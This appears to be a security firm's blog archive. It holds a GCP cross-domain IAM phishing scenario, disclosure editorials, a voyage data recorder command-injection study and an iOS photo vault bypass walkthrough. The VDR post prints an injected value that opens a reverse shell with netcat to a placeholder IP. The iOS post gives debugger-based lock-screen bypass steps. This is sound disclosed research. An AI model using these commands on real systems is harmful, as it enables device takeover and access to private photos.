GUEST BLOG | October 6, 2021

The Risk of Cross-Domain Sharing with Google Cloud’s IAM Policies | Chris Cuevas and Erik Gomez, SADA

We’re part of the security team at SADA, a leading Google Cloud Premier Partner. Given our notably diverse backgrounds, we appreciate the need for visibility into your core access controls.

If you’re involved in securing your enterprise’s Google Cloud Platform (GCP) environment, the organization policy for Domain Restricted Sharing (DRS) is, ideally, already a well-regarded part of your security toolbox. If DRS hasn’t made its way into your arsenal, please take a moment after reading this post to review these docs.

While we’re not covering DRS in depth here, we will be discussing related concepts. We believe it is crucial for an enterprise to maintain full visibility into which identities have access to its GCP resources. DRS is intended to prevent external or non-enterprise-managed identities from obtaining, or being granted, Identity and Access Management (IAM) role bindings within your GCP environment.

If we take this one step further, we believe an enterprise should also maintain visibility into how its managed identities are used within external GCP environments. This is the basis of this post, in which we’ll raise a number of concerns.

The SADA security team has found a feature of IAM that presents challenges with detection and mitigation. We’ll refer to this IAM feature as Cross-Domain Sharing (XDS).

Introduction to XDS

Today, external parties with GCP environments can provide IAM role bindings to your enterprise’s managed identities. These IAM policies can be set and made effective without your knowledge or awareness, resulting in GCP resources being accessed beyond the boundaries of your enterprise. While we agree there are a number of valid use cases for these XDS IAM policies, we are not comfortable with the lack of enterprise visibility.

Malicious actors are constantly seeking new avenues to gain any type of foothold within a targeted organization. Targeting cloud DevOps engineers and SREs with social engineering attacks yields high rewards, as these employees hold elevated privileges and trusted relationships.

Acknowledging this mindset, let’s consider the following:

Alice (alice@external.org) views internal.org as a prime target for a social engineering campaign combined with her newly discovered XDS bug. She quickly spins up a new GCP project called “Production Secrets” and adds a GCP IAM role binding to it for Bob (bob@internal.org) (see the diagram below).
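
To make this concrete, granting an external identity a role on a project is a single, ordinary IAM operation on Alice’s side, and nothing about it requires internal.org’s participation or approval. A minimal sketch of what Alice might run (the project ID and role here are illustrative assumptions):

# Run by Alice inside her own external.org GCP environment.
# internal.org receives no notification that this binding exists.
gcloud projects add-iam-policy-binding production-secrets \
    --member="user:bob@internal.org" \
    --role="roles/editor"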

Alice then initiates a social engineering campaign targeting Bob, informing him of the new “Production Secrets” project. As Alice is not part of the internal.org organization, the “Production Secrets” project is presented in Bob’s list of available GCP Projects without an organization association. And, if Bob searches for “Production Secrets” using the search bar of the GCP cloud console, the project will again be presented with no clear indicators it’s not actually affiliated with the internal.org GCP organization. With Bob not wanting to miss any team deadlines related to adopting the new “Production Secrets” project, he migrates secrets over and begins creating new ones within the “Production Secrets” project. Alice rejoices as internal.org’s secrets are now fully disclosed and available for additional attacks.

Figure: Cross-Domain Sharing (XDS) example

If your organization’s identities are being used externally, would you be able to prevent, or even detect, this type of activity? If Bob connects to this external project, what other attacks could he be vulnerable to in this scenario?

Keeping in mind that Google Cloud IAM identities, or “members,” in IAM policies can include users, groups, and entire domains, bad actors can easily expand their target scope from a single user identity to your whole enterprise. Once the nefarious GCP project “Production Secrets” is in place and accessible by everyone in your enterprise with GCP access, the bad actors can wait for unintended or accidental access while developing more advanced phishing ruses.
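
For reference, widening that binding from a single user to the whole enterprise is a one-word change to the member value (again run entirely by the external party; the role shown is illustrative):

gcloud projects add-iam-policy-binding production-secrets \
    --member="domain:internal.org" \
    --role="roles/viewer"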

Now, the good news!

The team at Google Cloud has been hard at work, and they recently released a new GCP Organization Policy constraint specifically to address this concern. The constraint, “constraints/resourcemanager.accessBoundaries”, once enabled, removes this concern as a broad phishing vector by no longer presenting external and no-organization GCP projects within the Cloud Console and associated APIs. While this approach does not address all risks related to XDS, it does reduce the effective target scope.

Before you run off and enable this constraint, remember there are valid use cases for XDS. We recommend identifying all XDS projects and assessing whether they are valid or whether they may be adversely affecting your enterprise’s managed identities. This exercise may help you identify external organizations, such as contractors, vendors, and partners, that should be allowed in the Organization Policy constraint.
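
As a sketch of what enabling the constraint could look like with the gcloud CLI (the organization IDs below are placeholders, and the exact allowed-value format should be confirmed against Google’s documentation for this constraint before rollout):

# Allow principals in your org to see only resources belonging to the listed organizations.
gcloud resource-manager org-policies allow \
    constraints/resourcemanager.accessBoundaries \
    organizations/111111111111 organizations/222222222222 \
    --organization=111111111111

Here, 111111111111 stands in for your own organization ID and 222222222222 for a vetted partner or vendor organization you intend to keep sharing with.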

To further reduce the chances of successful exfiltration of your enterprise’s sensitive data from existing GCP resources via XDS abuse, consider also implementing Google Cloud’s VPC Service Controls (VPC-SC).
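
A rough illustration of what a perimeter might look like (the project number, access policy ID, and service list are placeholders; a real deployment needs careful scoping to avoid breaking legitimate access):

gcloud access-context-manager perimeters create internal_org_perimeter \
    --title="internal.org data perimeter" \
    --resources=projects/111111111111 \
    --restricted-services=secretmanager.googleapis.com,storage.googleapis.com \
    --policy=222222222222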

Is your GCP environment at risk, or do you have security questions about your GCP environment? SADA and IOActive are here to help. Contact SADA for a Cloud Security Assessment and IOActive for a Cloud Penetration Test.

Chris Cuevas, Sr Security Engineer, SADA
Erik Gomez, Associate CTO, SADA


Note: This concern has been responsibly reported to the Google Cloud Security team.

EDITORIAL | August 3, 2021

Counterproliferation: Doing Our Part

IOActive has always done its part in preventing the misuse of our work.

IOActive’s mission is to make the world a safer and more secure place. In the past, we’ve worked to innovate in the responsible disclosure process, with the most visible and memorable example being Dan Kaminsky’s research into DNS.[1] This involved one of the first uses of widespread, multiparty coordinated responsible disclosure, which quickly became the gold standard as referenced in CERT’s Guide to Responsible Disclosure.[2]

We don’t always talk publicly about our non-technical innovations, since they frequently aren’t as interesting as the groundbreaking cybersecurity research our team delivers. However, a couple of recent events have prompted us to speak a bit about some of these less glamorous, but nonetheless extremely important, innovations. First, we were deeply saddened by the passing of Dan Kaminsky, and we would like to share how we’re building upon his legacy of non-technical innovation in vulnerability research. Second, global media organizations covered a significant disclosure regarding the misuse of weaponized mobile phone vulnerabilities, packaged with surveillance tools, to target journalists and others for political purposes rather than for lawful purposes consistent with basic human rights.

What We’re Doing

There are three primary elements to our policies that prevent the misuse of the vulnerabilities we discover.

Responsible Disclosure

IOActive has always had a policy of responsible disclosure. We transparently publish our policy on our website for everyone to see.[3] Over time, we’ve taken additional innovative steps to enhance this disclosure process.

We’ve built upon Dan’s innovation in responsible disclosure by sharing our research with impacted industries through multinational Information Sharing and Analysis Centers (ISACs).[4] Likewise, we’ve worked to confidentially disclose more of our pre-release research to our clients when it may impact them. As our consultants and researchers find new and innovative ways to break things, we’ll find new and innovative ways to disclose their work and associated consequences, with the goal of facilitating the best outcomes for all stakeholders.

Policy on the Sale of Vulnerabilities

IOActive is very clear on this simple policy, both publicly and with our clients: we do not sell vulnerabilities.

A well-developed market for vulnerabilities has existed for some time.[5] Unfortunately, other cybersecurity firms do sell vulnerabilities, and may not have the necessary ethical compartmentalization and required policies in place to safeguard the security and other interests of their clients and the public at large.

While we support the bug bounty concept, which can help reduce the likelihood of vulnerability sales and support the independent research community, as a commercial service bug bounties do not adequately address concerns such as personnel vetting or testing of resources only available when onsite at a client.

Contractual Responsible Disclosure Requirement

As a standard practice in our commercial work, we require the ability to report vulnerabilities we discover in third-party products externally only to the affected manufacturers, in addition to the client, to ensure that an identified defect can be properly corrected. IOActive offers to coordinate this disclosure process to the manufacturers on behalf of our clients.

This normally leads to a virtuous cycle of improved security for everyone through our commercial work. Each vulnerability discovery benefits not only the client but the entire ecosystem, and both in turn benefit from the vulnerability discovery work we do for other clients.

Every person reading this post has benefited from better security in the products and services they and their organizations use every day, due to the combination of our fantastic consultants and clients who support doing the right thing for the ecosystem.

Fundamentally, when a vulnerability is corrected, that risk is retired for everyone who updates to the secure version, and weaponization of the vulnerability is prevented. When those fixes are pushed out through an automated update process, the benefits accrue without any active effort on the part of end users or system maintainers.

How to Help

Make it Easy to Receive Disclosures

As a prolific vulnerability discloser, we see a wide spectrum of maturity in receiving and handling vulnerability disclosures. We must often resort to creative and time-intensive efforts to locate a contact who will respond to our attempts to disclose a vulnerability. Occasionally, we run into a dead end and are unable to make productive contact with organizations.

Here’s a short list of actions that will help make it easy to collect vulnerability information your organization really needs:

  1. Run a Vulnerability Disclosure Program. A vulnerability disclosure management program provides bidirectional, secure communication between the discloser and the impacted organization in a formal, operationalized manner. You can run such a program with internal resources or outsource it to a commercial firm providing managed vulnerability disclosure program services.
  2. Be Easy to Find. It should be simple and effortless for a researcher to find details on the disclosure process for any organization. A good test is to search for “<Your Organization Name> Vulnerability Disclosure” or “<Your Organization Name> Vulnerability Report” in a search engine. Ideally, your public disclosure page should appear in the first page or two of results; the security.txt sketch below can also help.
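
One lightweight way to help with both points is the security.txt convention (an IETF draft at the time of writing), served from /.well-known/security.txt on your main domain. A minimal, illustrative example with placeholder values:

Contact: mailto:security@example.com
Policy: https://example.com/vulnerability-disclosure-policy
Preferred-Languages: en
Expires: 2022-08-03T00:00:00.000Z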

Cesar Cerrudo, CTO of IOActive Labs, has a more in-depth post discussing how to get the best outcomes from working with researchers during the vulnerability disclosure process in his post, 10 Laws of Disclosure.[6]

Working with Security Firms

When you’re selecting a security firm for vulnerability discovery work, you should know what they will do with any vulnerabilities they find. Here are a few core questions for which any firm should have detailed, clear answers:

  • Does the company have a responsible disclosure policy?
  • What is the company’s policy regarding the sale of vulnerabilities?
  • Does the company require responsible disclosure of the vulnerabilities it discovers during client work?
  • How does the company handle third-party responsible disclosure for its clients?

Participate in the Discussion

The global norms around the sale and weaponization of cybersecurity vulnerabilities, as well as their integration into surveillance tools, are being established today. More constructive, thoughtful public debate today can prevent the current deleterious conduct from becoming a standard of global behavior with its associated dystopic outcomes through inattention and inaction.


References

[1] https://www.cnet.com/tech/services-and-software/security-bites-107-dan-kaminsky-talks-about-responsible-vulnerability-disclosure/
[2] https://resources.sei.cmu.edu/asset_files/SpecialReport/2017_003_001_503340.pdf
[3] https://ioactive.com/disclosure-policy/
[4] https://www.nationalisacs.org/
[5] https://www.rand.org/content/dam/rand/pubs/research_reports/RR600/RR610/RAND_RR610.pdf
[6] https://ioactive.com/10-laws-of-disclosure/

EDITORIAL | April 2, 2020

10 Laws of Disclosure

In my 20+ years working in cybersecurity, I’ve reported more than 1,000 vulnerabilities to a wide variety of companies, most found by our team at IOActive as well as some found by me. In reporting these vulnerabilities to many different vendors, the responses (or lack thereof) I’ve received have varied widely, depending on vendor security maturity. Just when I think I have seen everything related to vulnerability disclosure, I have new experiences – usually bad ones – but in general, I keep seeing the same problems over and over again.

I’ve decided it would be a good idea to write about some Laws of Disclosure in order to help those companies that are not mature enough to improve their vulnerability disclosure processes.

Law 1: The vulnerability reporter is always right

It doesn’t matter if the vulnerability reporter is gross, stupid, or insults you – they have zero-day findings on your technology, so you’d better say “please” and “yes” to everything you can. It’s less complicated to deal with someone you don’t like than to deal with 0-days in the wild, hurting your business.

Law 2: Have an easy-to-find and simple way to report vulnerabilities

It shouldn’t take more than a few seconds of browsing your website to find out how to report a vulnerability. Make it as easy and simple as possible; otherwise, you’ll learn about the vulnerability on the news.

Law 3: Your rules and procedures are not important

Some vulnerability reporters don’t care about your rules and procedures for reporting, and they don’t want your bounty or compensation. They don’t have to follow your rules; they just want the vulnerability reported and fixed.

Law 4: Keep the vulnerability reporter up to date

Never keep the vulnerability reporter in the dark. Instantly acknowledge when you receive a vulnerability report, and then keep the finder posted about your actions and plans.

Law 5: Don’t play dirty

Never try to trick the reporter in any way to buy time or avoid public disclosure. Sooner or later the reporter will find out and 0day you. Time is never on your side, so use it wisely.

Law 6: Compensate

The vulnerability reporter is working for free for you, so always compensate them in some way, like a bounty or at least public acknowledgement and thanks.

Law 7: Forget NDAs and threats

The vulnerability reporter is not part of your company and doesn’t care about your lawyers. The vulnerability must always be fixed and then published, not hidden.

Law 8: Put the right people in place

Your people handling vulnerability reports should have the right knowledge and proper training. Never put lawyers or marketing people in charge of vulnerability disclosure; vulnerability finders don’t want to hear BS from them.

Law 9: Coordinate

Properly coordinate the release dates of your fix and the vulnerability advisory publication. You don’t want your customers exposed for one second.

Law 10: Always publish

Don’t sweep vulnerabilities under the carpet with silent fixes without telling your customers how and why they should update. If you do, the vulnerability reporter will make sure your customers know it, and they won’t be happy when they find out.

These Laws are based on my own experience, but if I’ve missed something, feel free to share your own experience and help contribute to a better vulnerability disclosure process. Also, if you ever need help with disclosures yourself, let me know via Twitter DM or email. I’ll be happy to help.

RESEARCH | December 9, 2015

Maritime Security: Hacking into a Voyage Data Recorder (VDR)

In 2014, IOActive disclosed a series of attacks that affect multiple SATCOM devices, some of which are commonly deployed on vessels. Although there is no doubt that maritime assets are valuable targets, we cannot limit the attack surface to those communication devices that vessels, or even large cruise ships, are usually equipped with. In response to this situation, IOActive provides services to evaluate the security posture of the systems and devices that make up the modern integrated bridges and engine rooms found on cargo vessels and cruise ships. [1]

 

There are multiple facilities, devices, and systems located on ports and vessels and in the maritime domain in general, which are crucial to maintaining safe and secure operations across multiple sectors and nations.

 

Port security refers to protecting all of these assets from acts of piracy, terrorism, and other unlawful activities, such as smuggling. Recent activity appears to demonstrate that cyberattacks against this sector may have been underestimated. As threats evolve, procedures and policies must improve to take these new attack scenarios into account. For example, see this Federal Register notice on guidance for maritime cybersecurity standards: https://www.federalregister.gov/articles/2014/12/18/2014-29658/guidance-on-maritime-cybersecurity-standards

 

This blog post describes IOActive’s research related to one type of equipment usually present in vessels, Voyage Data Recorders (VDRs). In order to understand a little bit more about these devices, I’ll detail some of the internals and vulnerabilities found in one of these devices, the Furuno VR-3000.

 

What is a Voyage Data Recorder?

A VDR is the maritime equivalent of an aircraft’s ‘black box’ (http://www.imo.org/en/OurWork/Safety/Navigation/Pages/VDR.aspx). These devices record crucial data, such as radar images, position, speed, audio on the bridge, etc. This data can be used to understand the root cause of an accident.

 

Real Incidents

Several years ago, piracy acts were on the rise. Multiple cases were reported almost every day. As a result, nation-states along with fishing and shipping companies decided to protect their fleet, either by sending in the military or hiring private physical security companies.

On February 15, 2012, two Indian fishermen were shot by Italian marines onboard the merchant vessel Enrica Lexie, who supposedly opened fire thinking they were being attacked by pirates. This incident caused a serious diplomatic conflict between Italy and India, which continues to the present (https://en.wikipedia.org/wiki/Enrica_Lexie_case).

 

‘Mysteriously’, the data collected from the sensors and the voice recordings stored in the VDR during the hours of the incident were corrupted, making them totally unusable for the authorities’ investigation. As this story from the Indian Times mentions, the VDR could have provided authorities with crucial clues to figure out what really happened.

 

Curiously, Furuno was the manufacturer of the VDR that was corrupted in this incident. A Kerala High Court document covers this fact: http://indiankanoon.org/doc/187144571/ However, we cannot say whether the model the Enrica Lexie was equipped with was the VR-3000. Just as a side note, the vessel was built in 2008 and the Furuno VR-3000 was apparently released in 2007.

 

Just a few weeks later, on March 1, 2012, the Singapore-flagged cargo ship MV Prabhu Daya was involved in a hit-and-run incident off the Kerala coast. As a result, three fishermen were killed and a fourth went missing before eventually being rescued by a fishing vessel in the area. Indian authorities initiated an investigation of the accident that led to the arrest of the MV Prabhu Daya’s captain.

During that process, an interesting detail was reported in several Indian newspapers.

http://www.thehindu.com/news/national/tamil-nadu/voyage-data-recorder-of-prabhu-daya-may-have-been-tampered-with/article2982183.ece

 

So, What’s Going on Here?

From a security perspective, it seems clear VDRs pose a really interesting target. If you either want to spy on a vessel’s activities or destroy sensitive data that may put your crew in a difficult position, VDRs are the key.

 

Understanding a VDR’s internals can provide authorities, or third-parties, with valuable information when performing forensics investigations. However, the ability to precisely alter data can also enable anti-forensics attacks, as described in the real incident previously mentioned.

 

As usual, I didn’t have access to the hardware; but fortunately, I played some tricks and found both firmware and software for the target VDR. The details presented below are exclusively based on static analysis and user-mode QEMU emulation (already explained in a previous blog post). [2]
 
Figure: Typical architecture of a VR-3000

 

Basically, inside the Data Collecting Unit (DCU) is a Linux machine with multiple communication interfaces, such as USB, IEEE 1394, and LAN. Also inside the DCU is a backup HDD that partially replicates the data stored on the Data Recording Unit (DRU). The DRU is hardened so that it can survive an accident, and it contains a Flash disk that stores data for a 12-hour period. This unit stores all essential navigation and status data, such as bridge conversations, VHF communications, and radar images.

 

The International Maritime Organization (IMO) recommends that all VDR and S-VDR systems installed on or after 1 July 2006 be supplied with an accessible means for extracting the stored data from the VDR or S-VDR to a laptop computer. Manufacturers are required to provide software for extracting data, instructions for extracting data, and cables for connecting between a recording device and computer.

 

The following documents provide more detailed information:
After spending some hours reversing the different binaries, it was clear that security is not one of the main strengths of this equipment. Multiple services are prone to buffer overflows and command injection vulnerabilities. The mechanism to update firmware is flawed. Encryption is weak. Basically, almost the entire design should be considered insecure.
 

Take this function, extracted from the Playback software, as an example of how not to perform authentication. For those who are wondering what ‘Encryptor’ is, just a word: Scytale.

 

Digging further into the binary services we can find a vulnerability that allows unauthenticated attackers with remote access to the VR-3000 to execute arbitrary commands with root privileges. This can be used to fully compromise the device. As a result, remote attackers are able to access, modify, or erase data stored on the VDR, including voice conversations, radar images, and navigation data.

VR-3000’s firmware can be updated with the help of Windows software known as ‘VDR Maintenance Viewer’ (client-side), which is proprietary Furuno software.

 

The VR-3000 firmware (server-side) contains a binary that implements part of the firmware update logic: ‘moduleserv’

 

This service listens on 10110/TCP.
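
As a trivial first check (the address below is a placeholder), confirming whether a DCU exposes this service to a machine on the same network takes a single command:

nmap -p 10110 <DCU IP address>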

 

Internally, both server (DCU) and client-side (VDR Maintenance Viewer, LivePlayer, etc.) use a proprietary session-oriented, binary protocol. Basically, each packet may contain a chain of ‘data units’, which, according to their type, will contain different kinds of data.

 

Figure: Some of the supported commands
‘moduleserv’ handles several control messages intended to control the firmware upgrade process. Let’s analyze how it handles a ‘SOFTWARE_BACKUP_START’ request:
An attacker-controlled string is used to build a command that will be executed without being properly sanitized. Therefore, this vulnerability allows remote unauthenticated attackers to execute arbitrary commands with root privileges.
Figure: ‘Moduleserv’ v2.54 packet processing
Figure: ‘Moduleserv’ v2.54 unsanitized system call
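
To illustrate the class of bug, here is a generic sketch of the vulnerable pattern (this is not Furuno’s actual code or protocol; the variable name and payload are invented): a service builds a shell command by pasting an attacker-supplied field straight into the command line, so a crafted value terminates the intended command and appends another.

# Generic illustration of command injection only.
name='vdr.dat; nc -e /bin/sh 192.0.2.10 4444 #'    # value taken from the network packet
sh -c "cp /data/$name /mnt/backup/"                # runs the intended copy, then the injected command;
                                                   # if the vulnerable service runs as root, the attacker gets a root shell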

 

At this point, attackers could modify arbitrary data stored on the DCU in order to, for example, delete certain conversations from the bridge, delete radar images, or alter speed or position readings. Malicious actors could also use the VDR to spy on a vessel’s crew as VDRs are directly connected to microphones located, at a minimum, in the bridge.

 

However, compromising the DCU is not enough to cover an attacker’s tracks, as it only contains a backup HDD, which is not designed to survive extreme conditions. The key device in this anti-forensics scenario would be the DRU. The privileged position gained by compromising the DCU would allow attackers to modify/delete data in the DRU too, as this unit is directly connected through an IEEE1394 interface. The image below shows the structure of the DRU.
Figure: Internal structure of the DRU

Before IMO’s resolution MSC.233(90) [3], VDRs did not have to comply with security standards to prevent data tampering. Taking into account that we have demonstrated these devices can be successfully attacked, any data collected from them should be carefully evaluated and verified to detect signs of potential tampering.

 

IOActive, following our responsible disclosure policy, notified the CERT/CC about this vulnerability in October 2014. The CERT/CC, working alongside the JPCERT/CC, was in contact with Furuno and was able to reproduce and verify the vulnerability. Furuno committed to providing a patch for its customers “sometime in the year of 2015.” IOActive does not have further details on whether a patch has been made available.
 
References
————–

RESEARCH | November 19, 2015

Breaking into and Reverse Engineering iOS Photo Vaults

Every so often we hear stories of people losing their mobile phones, often with sensitive photos on them. Additionally, people may lend their phones to friends only to have those friends start going through their photos. For whatever reason, a lot of people store risqué pictures on their devices. Why they feel the need to do that is left for another discussion. This behavior has fueled a desire to protect photos on mobile devices.

One popular option is photo vault applications. These applications claim to protect your photos, videos, etc. In general, they create albums within their application containers and limit access with a passcode, pattern, or, in the case of newer devices, Touch ID.

I decided to take a look at some options for the iOS platform. I did a quick Google search for “best photo vaults iOS” and got the following results:
 
Figure 1: Search results for best iOS photo vaults


I downloaded the free applications, as this is what most typical users would do. This blog post discusses my findings.
Lab Setup
  • Jailbroken iPhone 4S (7.1.2)
  • BurpSuite Pro
  • Hex editor of choice
  • Cycript

Applications Reviewed
  • Private Photo Vault
  • Photo+Video Vault Keep Safe (My Media)
  • KeepSafe

I will cover the common techniques I used during each iOS application assessment. Additionally, I will take a deeper look at the Private Photo Vault application and get into some actual reverse engineering. The techniques discussed in the reverse engineering section can be applied to the other applications (left as an exercise for the reader).
Note: Unless otherwise stated, all commands are issued from Mac OS after having ssh’d into the jailbroken mobile device.
 
Private Photo Vault
The first application I looked at was Private Photo Vault. As it turns out, there have been several write-ups about the security, or lack thereof, of this application (see the references section for additional details). Because those write ups were published some time ago, I wanted to see if the developers had corrected the issues. As it turns out, the app was still vulnerable to some of the issues at the time of writing this post.
Bypassing the Lock Screen
When the app launches, the user is presented with the following screen:
Figure 2: Private Photo Vault Lock Screen
 
Bypassing this lock screen was trivial. The first step is to identify the Photo Vault process and then attach to it with cycript. For those not familiar with cycript, the following is taken from the cycript.org site:
“Cycript allows developers to explore and modify running applications on either iOS or Mac OS X using a hybrid of Objective-C++ and JavaScript syntax through an interactive console that features syntax highlighting and tab completion.”
To identify the Photo Vault process we issue the following commands:
ps -e | grep "Photo"
And then attach to it as shown:
cycript -p PhotoVault
 
 
 
Figure 3: Attaching to PhotoVault process with cycript
We then print the current view hierarchy using recursiveDescription by issuing the following command:
[[UIApp keyWindow] recursiveDescription]
 
 
 
Figure 4: Current View Hierarchy with recursiveDescription
 
Reviewing the current view hierarchy, we see a number of references to PasswordBox. Let’s see if we can alter what is being displayed. To do that we can issue the following command:
[#viewAddress setHidden:YES]
In this case we are testing the first PasswordBox at 0x15f687f0.
Figure 5: Hiding the first password input box
 
After executing the command we note that the first PasswordBox disappeared:
Figure 6: First password box hidden
Great, we can alter what is being displayed. Having obtained the current view, we now need to determine the controller. This can be accomplished with nextResponder as shown below. See references for details on nextResponder and the whole MVC model.
In a nutshell we keep calling nextResponder on the view until we hit a controller. In our case, we start with [#0x15f687f0 nextResponder] which returns <UIView: 0x15f68790> and then we call nextResponder on that like [#0x15f68790 nextResponder]. Eventually we hit a controller as shown:
Figure 7: Determining the View Controller
 
The WhiteLockScreenViewController controller seems to be responsible for the view. Earlier I dumped the class information with class-dump-z (not shown here). Examining the class revealed an interesting method called dismissLockScreen. Could it be that easy? As it turned out, it was. Simply calling the method as shown below was enough to bypass the lock screen:
Figure 8: Bypassing the lock screen with dismissLockScreen
 
Insecure Storage
During the setup I entered a passcode of 1337 to “protect” my photos. The next step, therefore, was to determine how the application was storing this passcode. Browsing the application directory revealed that the passcode was being stored in plaintext in the com.enchantedcloud.photovault.plist file in /var/mobile/Applications/A025EF5F-ED84-4D82-A23D-BBCFE183F539/Library/Preferences.
As a side note I wonder what would be the effect of changing “Request Pin = 0”? It may be worth investigating further.
Figure 9: Passcode stored in plaintext
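
For reference, dumping that preferences file from the ssh session is a one-liner (assuming a plutil build that supports the -p print flag is available, as implied by the tool list in the conclusion):

plutil -p /var/mobile/Applications/A025EF5F-ED84-4D82-A23D-BBCFE183F539/Library/Preferences/com.enchantedcloud.photovault.plist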
 
Not only is the PIN stored in plaintext, but the user has the option to password protect their albums. These album passwords are again stored in plaintext, in the Albums.plist file.
Figure 10: Album password stored in plaintext
No Encryption
As if this wasn’t bad enough, the stored photos were not encrypted. This has already been pointed out elsewhere. Surprisingly enough, it remains the case as of the time of this writing. The pictures are stored in the /0 directory:
Figure 11: Location of unencrypted photos
 
 
 
Figure 12: Unencrypted view of stored photo
Reverse Engineering Private Photo Vault
Ok, so we have seen how to bypass the lock screen using cycript. However, let’s say that you wanted to go “under the hood” in order to achieve the same goal.
You could achieve this using:
  • IDA Pro/Hopper
  • LLDB
  • Usbmuxd
  • Debugserver

Environment Setup
Attach the mobile device to your host machine and launch tcprelay (usbmuxd directory) using the following syntax:
tcprelay.py -t <remote-port-to-forward> <local-port-to-listen>
 
 
 
Figure 13: Launching tcprelay for debugging via USB
Tcprelay allows us to debug the application over USB as opposed to wifi, which can often be slow.
SSH into the device, start the debugserver, and attach to the PhotoVault process. Issue the following command:
debugserver *:8080 -a "PhotoVault"
 
 
 
Figure 14: Launching debugserver on the mobile device
 
Launch lldb from your host machine, and connect to the listening debug server on the mobile device by issuing the following command from within lldb:
process connect connect://localhost:8080
 
 
 
Figure 15: Connecting to debugserver with lldb
Decrypt Binary
Now that the environment is configured, we can start debugging. Decrypt the binary and open it in IDA. I used the following command to decrypt the binary:
DYLD_INSERT_LIBRARIES=dumpdecrypted_armv7.dylib /var/mobile/Applications/A025EF5F-ED84-4D82-A23D-BBCFE183F539/PhotoVault.app/PhotoVault
 
 
 
Figure 16:Decrypting the PhotoVault binary
At this point I usually check to see if the binary is a FAT binary (i.e. it contains code for multiple architectures). The command for that is: otool -hV PhotoVault.decrypted
 
 
 
Figure 17: Determining if the binary is a FAT binary
 
If it is indeed a FAT binary, I strip the architecture for my device. Given I am running an iPhone 4S, I ran the following command:
lipo -thin armv7 -output PhotoVault-v7 PhotoVault.decrypted
The PhotoVault-v7 binary is what we will analyze in IDA or Hopper (see the reference section for instructions on configuring lldb and debugserver).
Earlier we established that WhiteLockScreenViewController was the controller responsible for the lock screen. This will become important in a bit. If we enter an incorrect password, the application prints “Wrong Passcode – Try Again”. Our first step, therefore, is to find occurrences of this in IDA.

Figure 18: Searching for occurrences of “Wrong Passcode”
We see several occurrences, but any reference to WhiteLockScreenViewController should be of interest to us. Let’s investigate this more. After a brief examination we discover the following:

Figure 19: Examining WhiteLockScreenViewController customKeyboardButtonPressed
 
At 0013A102, the lockScreen:isPasswordCorrect method is called, and at 0013A114 the return value is checked. At 0013A118 a decision is made on how to proceed. If we entered an incorrect passcode, the application will branch to loc_13A146 and display “Wrong Passcode” as shown in the snippet below. 
Figure 20: Wrong Passcode branch we need to avoid
Obviously, we want the application to branch to 0013A11A, because in that branch we see references to a selRef_lockScreen_didEnterCorrectPassword_ method.
Figure 21: Branch we are interested in taking
Let’s set a breakpoint at 0013A110, right before the check of the return value is done. Before we can do that, we need to account for ASLR, so we must first determine the ASLR offset on the device.
Figure 22: Breakpoint will set at 0013A110
To accomplish this we issue the following command from within our lldb session:
image list -o -f
The image is loaded at 0xef000, so the address we need to break on is 0x000ef000 + 0x0013A110 = 0x00229110.
Figure 23: Determining ASLR offset
We set a breakpoint at 0x229110 with the following command: br s -a 0x229110
From this point breakpoints will be calculated as ASLR Offset + IDA Offset.
 
Figure 24: Setting the breakpoint
With our breakpoint set, we go back to the device and enter an arbitrary passcode. The breakpoint is hit and we print the value of register r8 with p $r8.
 
 
 
Figure 25: Examining the value in register r8
Given the value of zero, the TST.W R8, #0xFF instruction will see us taking the branch that prints “Wrong Passcode”. We need to change this value so that we take the other branch. To do that we issue the following command: register write r8 1
 
 
 
Figure 26: Updating the r8 register to 1
 
The command sets the value of register r8 to 1. We are almost there. But before we continue, let’s examine the branch we have taken. In that branch we see a call to lockScreen_didEnterCorrectPassword. So again, we search IDA for that function and the results show it references the PasswordManager class.
Figure 27: Searching IDA for occurences of lockScreen_didEnterCorrectPassword
 
We next examine that function where we notice several things happening:
Figure 28: Examining lockScreen_didEnterCorrectPassword
 
In short, in this block the application reads the PIN stored on the device and compares it to the value we entered at 0012D498. Of course this check will fail, because we entered an incorrect PIN. Looking further at this function revealed a call to the familiar dismissLockScreen. Recall this is the function we called in cycript earlier.
Figure 29: Branch with dismissLockScreen
 
It seems then that we need to take this branch. To do that, we change the value in r0  so that we get our desired result when the TST instruction is called. This ends up tricking the application into thinking we entered the correct PIN. We set a breakpoint at 0012D49C (i.e. the point at which we test for the return value from isEqualToString). Recall we are still in the lockScreen_didEnterCorrectPassword method of the PasswordManager class.
Figure 30: Point at which the PIN is verified
We already know the check will fail, since we entered an incorrect PIN, so we update the value in r0 to 1.
Figure 31: Updating r0 register to 1 to call dismissLockScreen
When we do that and continue execution, the dismissLockScreen method is called and the lock screen disappears, granting us access to the photos. So, to recap: the first patch allows us to call lockScreen_didEnterCorrectPassword, and the second patch allows us to call dismissLockScreen, all with an arbitrary PIN.
Let’s now look at the other applications.
My Media
Insecure Webserver
This was a very popular application in the app store. However, it suffered from some of the same vulnerabilities highlighted previously. What is interesting about this application is that it starts a web server on port 5555, which essentially allows users to manage their albums.
Figure 32: Web server started on port 5555
Browsing to the address results in the following interface:
Figure 33: My Media Wifi Manager
 
The first thing I noticed was that there was no authentication. Anybody on the same network could potentially gain access to the user’s albums. Looking a little deeper revealed that the application was vulnerable to common web application vulnerabilities. An example of this is stored cross-site scripting (XSS) in the Album name parameter:
Figure 34: Stored XSS in Album name
Insecure Storage
Again, the photos were not encrypted (verified using the hex editor from earlier). Photos and videos were stored in the following location:
/var/mobile/Applications/61273D04-3925-41EF-BD63-C2B0BC128F70/Library/XFFile/Decoy/1/Picture/Album1
Figure 35: Insecure storage of photos
On the device, this looks like the following:
Figure 36: Albums and photos on device
 
One of the features of these password-protected photo vaults is the ability to set up decoys. If the user chooses to create a decoy, entering the decoy password takes them to a “fake” album. I created a decoy album in this application, added a photo, and found that the decoy photos were also not encrypted (not that I expected them to be). The decoy photos were stored in the following location:
/var/mobile/Applications/B73BB177-CEB7-4576-BDFC-2408A0369D42/Library/XFFile/Decoy/2/Picture/Decoy Album
The application stored user credentials in an unencrypted sqlite database. The passcode required to access the application was 1234 and was tied to the administrative account as shown. This was the passcode I chose when I was configuring the application. I also created a decoy user. These credentials were stored plaintext in the users table.
Figure 37: Extracting credentials with sqlite
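
For readers without the screenshot, the extraction amounts to a single query against the application’s database (the database path below is a placeholder, since the exact filename varies):

sqlite3 /var/mobile/Applications/<My Media app GUID>/Library/<database file> "SELECT * FROM users;"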
 
KeepSafe
 
Bypassing the Lock Screen
Again bypassing the lock screen was trivial.
Figure 38: KeepSafe LockScreen
 
